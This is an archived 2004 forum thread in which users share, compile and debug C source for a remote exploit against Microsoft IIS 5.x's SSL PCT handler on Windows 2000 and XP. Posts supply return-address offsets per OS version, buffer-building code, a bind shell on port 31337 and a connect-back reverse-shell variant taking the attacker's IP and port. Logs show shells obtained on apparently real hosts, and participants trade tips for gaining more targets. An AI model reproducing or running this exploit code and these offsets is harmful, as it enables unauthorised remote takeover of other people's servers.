wrong offset for "Windows XP SP1 German/English",0x0ffb832f to fix it is 0x0ffb8812
CODE
Windows XP SP1 German/English/French => 0x0ffb8812
Windows XP SP1 Norsk => 0x0ffb82cc
agathos
Apr 24 2004, 03:28 PM
thanks 101 i´ve fixed some other things in the src , too and added your offset and fixed the other offset
agathos
Apr 24 2004, 03:45 PM
Linux Edition Version compiling under Linux works
CODE
/* ============================================================== Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit Based on THC SSL Exploit + Offset Support from cyrex ==============================================================
Usage: ./ssl -h <host> -t target
Follow targets are already Added
Windows 2000 SP4 German/English <- thanks to 101 Windows 2000 SP3 German/English Windows 2000 SP2 German/English Windows 2000 SP1 German/English Windows XP SP0 German/English Windows XP SP1 German/English Windows XP SP1 Norsk <- thanks to 101 Windows XP Universal (Testing)
int main(int argc, char *argv[]) { int arg; unsigned int i,sock,sock2,addr,rc; unsigned char *badbuf,*p; //unsigned long offset = 0x6741a1cd; unsigned long offset = arch[x].magic; unsigned long XOR = 0xffffffff;
printf("[*] Using Offset: 0x%.8x OS: %s\n",arch[x].magic,arch[x].name);
send(sock,badbuf,346,0); printf("[*] Exploit send successfully ! Sleeping a while ....\n"); usleep(1000); } else printf("\nCan't connect to ssl port 443!\n");
if(rc==0) { printf("[*] Trying to get a shell\n\n"); sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); mytcp.sin_port = htons(31337); rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp)); if(rc!=0) { printf("can't connect to port 31337;( maybe firewalled ...\n"); exit(-1); } shell(sock2); }
shutdown(sock,1); close(sock);
free(badbuf);
exit(0); }
void usage() { int i; printf("=======================================================\n"); printf("Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit\n"); printf("Based on THC SSL Exploit + Offset Support from cyrex\n"); printf("=======================================================\n"); printf("Targets:\n"); for(i=0;i<=max_num;i++) { printf("%d - %s\n",i,arch[i].name); } exit(-1); }
void shell(int sock) { int l; char buf[1024]; struct timeval time; unsigned long ul[2];
time.tv_sec = 1; time.tv_usec = 0;
while (1) { ul[0] = 1; ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time); if(l == 1) { l = recv (sock, buf, sizeof (buf), 0); if (l <= 0) { printf ("bye bye...\n"); return; } l = write (1, buf, l); if (l <= 0) { printf ("bye bye...\n"); return; } } else { l = read (0, buf, sizeof (buf)); if (l <= 0) { printf("bye bye...\n"); return; } l = send(sock, buf, l, 0); if (l <= 0) { printf("bye bye...\n"); return; } } } }
i´ve finished with fixing src it works perfect under linux
CODE
./ssl -h *.*.*.* -t 5 ======================================================= Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit Based on THC SSL Exploit + Offset Support from cyrex =======================================================
[*] building buffer [*] connecting the target [*] Using Offset: 0x0ffb8812 OS: Windows XP SP1 German/English [*] Exploit send successfully ! Sleeping a while .... [*] Trying to get a shell
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\>
have fun
ScriptGod
Apr 24 2004, 04:30 PM
QUOTE (101 @ Apr 24 2004, 03:10 PM)
wrong offset for "Windows XP SP1 German/English",0x0ffb832f to fix it is 0x0ffb8812
CODE
Windows XP SP1 German/English/French => 0x0ffb8812
Windows XP SP1 Norsk => 0x0ffb82cc
0x0ffa8021 this offset should work on all english and german Windows XP, with or without a service pack if it uses jmp esp
Paul
Apr 24 2004, 04:45 PM
Ok, i found some help with compiling with installing some programs read this But now it gives a error that it cant find unistd.h, some1 got this ? edit: also misses sys/time.h
101
Apr 24 2004, 04:51 PM
QUOTE (agathos @ Apr 24 2004, 03:45 PM)
i´ve finished with fixing src it works perfect under linux
CODE
./ssl -h *.*.*.* -t 5 ======================================================= Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit Based on THC SSL Exploit + Offset Support from cyrex =======================================================
[*] building buffer [*] connecting the target [*] Using Offset: 0x0ffb8812 OS: Windows XP SP1 German/English [*] Exploit send successfully ! Sleeping a while .... [*] Trying to get a shell
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\>
have fun
same offset works so for /French & prolly more other languages ;o
101
Apr 24 2004, 05:05 PM
looks like all original offsets of the cyrex code are changed
w2k SP4 german/english isnt 0x67419ce8 but 0x6741a1cd (cf original code of j.cyberpunk)
ssj4conejo
Apr 24 2004, 05:19 PM
Yep compiles sweetly under linux.
Thanksf or the mod, this exploit is great i just wish there were more IIS 5.0 servers out there. Most of thfe servers out there are linux.
agathos
Apr 24 2004, 05:22 PM
ok 101 thanks for info we can change it.. erm i think we can compile it under cygwin , too because it works under linux without any error lets try
kevin007
Apr 24 2004, 05:37 PM
Upps, trying to compile now, will say how it goes
Thanks, looks interesting
MxMx
Apr 24 2004, 06:21 PM
can't compile under cygwin .. can someone help me please
agathos
Apr 24 2004, 06:31 PM
which errors you got?
MxMx
Apr 24 2004, 06:32 PM
missing some files
brOmstar
Apr 24 2004, 06:51 PM
thx for the offsets the new offset(only one i tested) for sp4 works well i was so free to add them to the revshell version together with a timeout option =)
morbido
Apr 24 2004, 07:08 PM
could anyone try to compile it on cygwin ???
I having some problems compiling on it
Nostremato
Apr 24 2004, 07:20 PM
can compile with cygwin without errors
Paul
Apr 24 2004, 08:24 PM
@cygwin
QUOTE
D:\Program Files\cygwin\bin>gcc d:\forum\exploit.c -o exploit.exe d:/forum/exploit.c:22:19: stdio.h: No such file or directory d:/forum/exploit.c:23:20: stdlib.h: No such file or directory d:/forum/exploit.c:24:20: string.h: No such file or directory d:/forum/exploit.c:25:19: errno.h: No such file or directory d:/forum/exploit.c:26:20: string.h: No such file or directory d:/forum/exploit.c:27:20: assert.h: No such file or directory d:/forum/exploit.c:28:19: fcntl.h: No such file or directory d:/forum/exploit.c:30:22: winsock2.h: No such file or directory d:/forum/exploit.c: In function `main': d:/forum/exploit.c:103: error: storage size of `mytcp' isn't known d:/forum/exploit.c:105: error: `WSADATA' undeclared (first use in this function)
d:/forum/exploit.c:105: error: (Each undeclared identifier is reported only once
d:/forum/exploit.c:105: error: for each function it appears in.) d:/forum/exploit.c:105: error: syntax error before "wsaData" d:/forum/exploit.c:119: error: `EOF' undeclared (first use in this function) d:/forum/exploit.c:122: error: `optarg' undeclared (first use in this function) d:/forum/exploit.c:137: warning: assignment makes pointer from integer without a cast d:/forum/exploit.c:157: error: `wsaData' undeclared (first use in this function)
d:/forum/exploit.c:163: warning: assignment makes pointer from integer without a cast d:/forum/exploit.c:168: error: `INADDR_NONE' undeclared (first use in this funct ion) d:/forum/exploit.c:174: error: `AF_INET' undeclared (first use in this function)
d:/forum/exploit.c:174: error: `SOCK_STREAM' undeclared (first use in this funct ion) d:/forum/exploit.c:174: error: `IPPROTO_TCP' undeclared (first use in this funct ion) d:/forum/exploit.c:181: error: `NULL' undeclared (first use in this function) d:/forum/exploit.c:182: error: dereferencing pointer to incomplete type d:/forum/exploit.c:182: error: dereferencing pointer to incomplete type d:/forum/exploit.c:187: error: dereferencing pointer to incomplete type d:/forum/exploit.c:195: error: invalid application of `sizeof' to an incomplete type d:/forum/exploit.c: In function `shell': d:/forum/exploit.c:249: error: storage size of `time' isn't known d:/forum/exploit.c:260: error: `fd_set' undeclared (first use in this function) d:/forum/exploit.c:260: error: syntax error before ')' token d:/forum/exploit.c:260: error: `NULL' undeclared (first use in this function)
D:\Program Files\cygwin\bin>
Probly doing something wrong
agathos
Apr 24 2004, 08:53 PM
upgrade your cygwin with devel packages
goldsun
Apr 25 2004, 03:08 AM
How to get the return address?
find 0xEB0x0F in dlls or other OPs?
agathos
Apr 25 2004, 12:38 PM
a New version is now out .. with connect Back shell
CODE
/* ================================================================= Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit SSL Exploit + Offset & Connect Back Support from cyrex =================================================================
0 - Windows 2000 SP4 German/English 1 - Windows 2000 SP3 German/English 2 - Windows 2000 SP2 German/English 3 - Windows 2000 SP1 German/English 4 - Windows XP SP0 German/English 5 - Windows XP SP1 German/English 6 - Windows XP SP1 Norsk 7 - Windows XP Universal (Testing)
LOGS of successfully Exploitation
cyrex@whitehat:~$ ./ssl -h 66.*.*.* -t 5 -c *.*.*.* -p 113 ======================================================= Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit SSL Exploit + Offset & Connect Back Support from cyrex ======================================================= [+] building buffer [+] connecting the target [+] Using Offset: 0x0ffb8812 OS: Windows XP SP1 German/English [+] exploit send [+] Using ip: *.*.*.* port: 113 to Connect Back [*] waiting for shell [*] Exploit successful ! Have fun ! [*] Gamer OVER !! Hackerz Win
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
int main(int argc, char *argv[]) { int arg; unsigned int i,sock,sock2,sock3,addr,rc,len=16; unsigned char *badbuf,*p; unsigned long offset = arch[x].magic; unsigned long XOR = 0xffffffff;
unsigned short cbport,cport; unsigned long cbip;
struct sockaddr_in mytcp; struct hostent * hp;
if(argc<9) { usage(argv[0]); exit(-1); }
if(argc>9) { usage(argv[0]); exit(-1); }
printf("=======================================================\n"); printf("Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit\n"); printf("SSL Exploit + Offset & Connect Back Support from cyrex\n"); printf("=======================================================\n");
while((arg=getopt(argc, argv, "h:t:c:p:")) != EOF) { switch(arg) { case 'h': host = optarg; break; case 't': x=atoi(optarg); if(x>max_num) { printf("The target that you selected doesnt exist\n"); exit(-1); } break; case 'c': cip = strdup(optarg); break; case 'p': cport=atoi(optarg); break; default: usage(argv[0]); } }
void usage(char *cmd) { int i; printf("=================================================================\n"); printf(" Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit\n"); printf(" SSL Exploit + Offset & Connect Back Support from cyrex\n"); printf("=================================================================\n"); printf("Usage: %s -h <targethost> -t <target> -c <yourhost> -p <yourport>\n",cmd); printf("e.g. : %s -h 127.00.1 -t 0 -c 192.168.1.3 -p 113\n",cmd); printf("Targets:\n"); for(i=0;i<=max_num;i++) { printf("%d - %s\n",i,arch[i].name); } exit(-1); }
void shell(int sock) { int l; char buf[1024]; struct timeval time; unsigned long ul[2];
time.tv_sec = 1; time.tv_usec = 0;
while (1) { ul[0] = 1; ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time); if(l == 1) { l = recv (sock, buf, sizeof (buf), 0); if (l <= 0) { printf ("bye bye...\n"); return; } l = write (1, buf, l); if (l <= 0) { printf ("bye bye...\n"); return; } } else { l = read (0, buf, sizeof (buf)); if (l <= 0) { printf("bye bye...\n"); return; } l = send(sock, buf, l, 0); if (l <= 0) { printf("bye bye...\n"); return; } } } }
for the exe file look at the donwload section
jimmy
Apr 25 2004, 04:56 PM
could you please tell me the kind of offset ? is it an EBP ? EIP ? jmp esp ?
technoboy
Apr 25 2004, 07:05 PM
jmp esp
jimmy
Apr 26 2004, 02:22 AM
I can use jmp esp's in which dll's if you know otherwise I can always attach my debugger and take a look
jimmy
Apr 26 2004, 06:50 AM
if I see it well you define int x=0; in the beginning
than a bit further you have unsigned long offset = arch[x].magic; So at that moment x is still 0 , so the offset taken will be the 0 one and not the XP one, just a bit furter you fix that and it displays the right offset, but it uses the wrong one :s
gsicht
Apr 26 2004, 04:10 PM
how is the universal xp offset? does it work?
agathos
Apr 26 2004, 05:12 PM
jimmy i see that you dont understand C dont talk shit
arch[x].magic means :
CODE
case 't': x=atoi(optarg); if(x>max_num) { printf("The target that you selected doesnt exist\n"); exit(-1); }
with the parameter -t , x will be the number of the targets like 2 or 4
brOmstar
Apr 26 2004, 05:43 PM
i don't understand that too ,u set x to the given parameter at the line u mean but the offset was declared some lines before and is not changed until use
CODE
unsigned long offset = arch[x].magic; // here us set the current arch[x].magic to the offset var x= 0 at this time
unsigned long XOR = 0xffffffff;
unsigned short cbport,cport; unsigned long cbip;
struct sockaddr_in mytcp; struct hostent * hp;
if(argc<9) { usage(argv[0]); exit(-1); }
if(argc>9) { usage(argv[0]); exit(-1); }
printf("=======================================================\n"); printf("Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit\n"); printf("SSL Exploit + Offset & Connect Back Support from cyrex\n"); printf("=======================================================\n");
while((arg=getopt(argc, argv, "h:t:c:p:")) != EOF) { switch(arg) { case 'h': host = optarg; break; case 't': x=atoi(optarg); // here x is set to the given os argument 0-6 if(x>max_num) { printf("The target that you selected doesnt exist\n"); exit(-1); } break; case 'c': cip = strdup(optarg); break; case 'p': cport=atoi(optarg); break; default: usage(argv[0]); } }
badbuf = malloc(327); memset(badbuf,0,327);
printf("[+] building buffer\n");
p = badbuf;
memcpy(p,sslshit,sizeof(sslshit));
p+=sizeof(sslshit)-1;
strcat(p,jumper);
strcat(p,greetings_to_microsoft);
offset^=XOR; strncat(p,(unsigned char *)&offset,4); // here u use the offset delared at the beginning
where the old offset is changed to the selected? shouldn't there be something like offset = arch[x].magic after set x to the os argument???
agathos
Apr 26 2004, 06:21 PM
br0mstar erm
why i put in this message ?!
CODE
printf("[+] Using Offset: 0x%.8x OS: %s\n",arch[x].magic,arch[x].name);
brOmstar
Apr 26 2004, 06:27 PM
to display the used offset but where u set it because the offset is concated some lines before to to the buffer u send? (i only want to understand don't critisize u or something )
CODE
int max_num = 7; //### here u set the max targets int x=0; //### here u initialize x with the value 0
int arg; unsigned int i,sock,sock2,sock3,addr,rc,len=16; unsigned char *badbuf,*p; unsigned long offset = arch[x].magic; //### u set the offset to 0x6741a1cd cause x = 0 at this time
unsigned long XOR = 0xffffffff;
unsigned short cbport,cport; unsigned long cbip;
struct sockaddr_in mytcp; struct hostent * hp;
if(argc<9) { usage(argv[0]); exit(-1); }
if(argc>9) { usage(argv[0]); exit(-1); }
printf("=======================================================\n"); printf("Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit\n"); printf("SSL Exploit + Offset & Connect Back Support from cyrex\n"); printf("=======================================================\n");
while((arg=getopt(argc, argv, "h:t:c:p:")) != EOF) { switch(arg) { case 'h': host = optarg; break; case 't': x=atoi(optarg); //### here u set x to the given os argument if(x>max_num) { printf("The target that you selected doesnt exist\n"); exit(-1); } break; case 'c': cip = strdup(optarg); break; case 'p': cport=atoi(optarg); break; default: usage(argv[0]); } }
//### u allocated the bufferspace for the 'bad' code;)
badbuf = malloc(327); memset(badbuf,0,327);
printf("[+] building buffer\n");
p = badbuf;
memcpy(p,sslshit,sizeof(sslshit));
p+=sizeof(sslshit)-1;
strcat(p,jumper); //### adding the jumper asm code
strcat(p,greetings_to_microsoft); //#### adding the ms greetings asm
offset^=XOR; strncat(p,(unsigned char *)&offset,4); //### !!! here u add the current offset to the buffer - but offset is still x6741a1cd cause u don't changed the offset value since initialising or how you did it ? i don't see it =(
if (!hp){ addr = inet_addr(host); } if ((!hp) && (addr == INADDR_NONE) ) { printf("[-] Unable to resolve %s\n",host); exit(-1); }
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (!sock) { printf("socket() error...\n"); exit(-1); }
if (hp != NULL) memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length); else mytcp.sin_addr.s_addr = addr;
if (hp) mytcp.sin_family = hp->h_addrtype; else mytcp.sin_family = AF_INET;
mytcp.sin_port=htons(443);
printf("[+] connecting the target\n");
rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in)); if(rc==0) { send(sock,badbuf,326,0); //### here u send the prepared buffer with the old offset printf("[+] Using Offset: 0x%.8x OS: %s\n",arch[x].magic,arch[x].name); //### showing the right offset but did u used that ? where u set the offset to the arch[x].magic value here u only print the value ?? printf("[+] exploit send\n"); usleep(5000);
jimmy
Apr 26 2004, 09:26 PM
man you say I don't know c ? you're funny guy. better check your code and you'll see it uses wrong offset. Try it if you don't believe me, it will print out right offset on screen, but it will always use offset 0 I made a windows version myself of it and fixed it, works like a charm here BTW you'dd better also fix the shell, now it keeps waiting for ages if unsuccesfull. If you're such a 1337 c coder, why you didn't fix it and put a timeout like I did
brOmstar
Apr 26 2004, 09:37 PM
adding the timeout was really simple i did it too but imy offsets don't really work don't know why ....never had a shell with xp only 2k
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
i´ve fixed some other things in the src , too and added your offset and fixed the other offset
compiling under Linux works
.. can someone help me please
dont talk shit